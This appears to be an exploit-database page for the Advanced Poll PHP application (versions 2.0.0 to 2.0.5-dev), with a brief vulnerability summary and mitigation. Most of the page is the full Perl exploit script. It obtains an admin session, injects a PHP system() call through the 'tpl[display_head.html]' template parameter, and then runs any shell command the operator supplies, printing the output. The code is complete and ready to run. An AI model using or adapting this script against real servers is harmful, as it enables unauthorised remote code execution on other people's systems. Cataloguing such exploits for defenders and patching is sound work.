header-logo
Suggest Exploit
vendor:
Advanced Poll
by:
diwou
7.5
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Advanced Poll
Affected Version From: 2.0.0
Affected Version To: 2.0.5-dev
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE

This exploit allows an attacker to execute arbitrary code on a target system running Advanced Poll version 2.0.0 to 2.0.5-dev. The vulnerability is due to a lack of input validation in the 'tpl[display_head.html]' parameter, which can be manipulated to execute system commands. By injecting a command into the 'tpl[display_head.html]' parameter and sending a specially crafted request to the target server, an attacker can execute arbitrary code with the privileges of the web server.

Mitigation:

Update to a version of Advanced Poll that is not vulnerable to this exploit. Disable the 'tpl[display_head.html]' parameter or implement input validation to prevent command injection.
Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
# 
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# Hey, what a mad world!
#

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

#
# args: http://url/apoll_path cmd
#
# proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/'
# url: http|https://tatget:(port)/phppoll/
#

die("RTFC! ;)") unless(@ARGV>1);

my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]);

my %ipost=
(
	poll_tplset => 'default',
	'tpl[display_head.html]' =>
<<HEAD
\\".system(getenv(HTTP_PHP)).exit().\\"
<table width="\$pollvars[table_width]" border="0" cellspacing="0" cellpadding="1" bgcolor="\$pollvars[bgcolor_fr]">
  <tr align="center">
    <td><style type="text/css">
       <!--
        .input { font-family: \$pollvars[font_face]; font-size: 8pt}
        .links { font-family: \$pollvars[font_face]; font-size: 7.5pt; color: \$pollvars[font_color]}
       -->
      </style><font face="\$pollvars[font_face]" size="-1" color="#FFFFFF"><b>\$pollvars[title]</b></font></td>
  </tr>
  <tr align="center">
    <td>
      <table width="100%" border="0" cellspacing="0" cellpadding="2" align="center" bgcolor="\$pollvars[bgcolor_tab]">
        <tr>
          <td height="40" valign="middle"><font face="\$pollvars[font_face]" color="\$pollvars[font_color]" size="1"><b>\$question</b></font></td>
        </tr>
        <tr align="right" valign="top">
          <td>
            <form method="post" action="\$this->form_forward">
            <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
              <tr valign="top" align="center">
                <td>
                  <table width="100%" border="0" cellspacing="0" cellpadding="1" align="center">
HEAD
,
	action   =>  '',
	tplset   =>  'default',
	tpl_type =>  'display',
	session  =>  '',
	uid      =>  1
);

my %epost=
(
	session    => '',
	uid        => 1,
	poll_tplst => 'default',
	tpl_type   => 'display',
);

my %zday=
(
	username => 'jakahw4nk4h',
	'pollvars[poll_username]' => 'jakahw4nk4h',
	password => 'fuckoff',
	'pollvars[poll_password]' => ''
);

$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";

$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);

if($ENV{PROXY})
{
	$lwp->proxy(['http','https'],$ENV{PROXY});
	print "Using proxy ".$ENV{PROXY}."\n";
}

$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Doing some pretty with ".$url."...\n\n";

print "+ generating session...\n";
$out=$lwp->post($url,\%zday)->content();
if($out=~ /index\.php\?session=((.){32})/)
{
	$ipost{'session'}=$epost{'session'}=$1;
	print "  session: ".$ipost{'session'}."\n";
	
	$url=~s/index\.php/admin_templates\.php/g;
	print "+ injecting diplay_head.html template...\n";
	$out=$lwp->post($url,\%ipost)->content();
	$epost{'action'}=$1 if($out=~ /<input type="submit" name="action" value="(.*)" class="button">/);
	print "  button: ".$epost{'action'}."\n";

	$url=~s/admin_templates\.php/admin_preview\.php/g;
	print "+ executing...\n";
	$out=$lwp->post($url,\%epost,PHP => "echo BOCE;".$cmd.";echo EOCE")->content();

	print "-- BOCE --\n";
	foreach $out (split(/\n/,$out))
	{
		$res=1,next if($out=~/BOCE/);
		$res=0,next if($out=~/EOCE/);
		print $out."\n" if($res);
	}
	print "-- EOCE --\n";
}
else
{
	print "don't worry, u can improve me! eh eh eh :D?\n";
}

sub md5
{
	$_=new MD5;
	$_->add(@_);
	return unpack("H*",$_->digest());
}

# milw0rm.com [2007-02-13]